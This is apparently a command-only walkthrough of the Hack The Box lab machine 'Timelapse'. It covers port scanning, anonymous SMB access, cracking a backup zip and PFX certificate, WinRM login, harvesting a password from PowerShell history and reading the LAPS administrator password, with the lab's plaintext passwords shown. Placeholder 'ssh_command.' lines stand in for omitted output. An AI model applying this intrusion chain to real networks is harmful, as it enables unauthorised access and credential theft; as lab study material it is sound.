Timelapse

Timelapse


HTB Windows

nmap -A -p- -oA timelapse 10.10.11.152 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA timelapse 10.10.11.152

nmap -sU -O -p- -oA timelapse-udp 10.10.11.152

ping -c 1 10.10.11.152

ssh_command.

nmap -p- --open -T5 -v -n 10.10.11.152

echo "10.10.11.152 timelapse.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.152 -oG allPorts

ssh_command. extractPorts allPorts

ssh_command.

nmap -sCV -p53,88,135,139,445,464,593,636,3268,3269,5986,9389,49667,49675,49676,49,697,53333 10.10.11.152 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

crackmapexec smb 10.10.11.152 --shares

smbclient -L 10.10.11.152 -N

ssh_command.

smbmap -H 10.10.11.152 -u 'null'

ssh_command.

smbclient //10.10.11.152/Shares -N

ssh_command.

cd Dev

get winrm_backup.zip

7z l winrm_backup.zip

ssh_command.

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip

ssh_command.

unzip winrm_backup.zip

ssh_command.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

pfx2john legacyy_dev_auth.pfx

ssh_command.

credenciales -> thuglegacy

crackpkcs12 -d /usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx

ssh_command.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

ssh_command.

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem

ssh_command.

evil-winrm -i 10.10.11.152 -c certificate.pem -k priv-key.pem -S

type user.txt

ssh_command.

net user

whoami /priv

ssh_command.

net user svc_deploy

ssh_command.

type AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

ssh_command.

crackmapexec smb 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'

ssh_command.

evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

ssh_command.

Get-ADComputer DC01 -property 'ms-mcs-admpwd'

ssh_command.

evil-winrm -i 10.10.11.152 -u 'administrator' -p '@m0bq+10Y&8eW;!d5Xj#[+z9' -S

ssh_command.

type root.txt

ssh_command.

© 2024 Cu3rv0x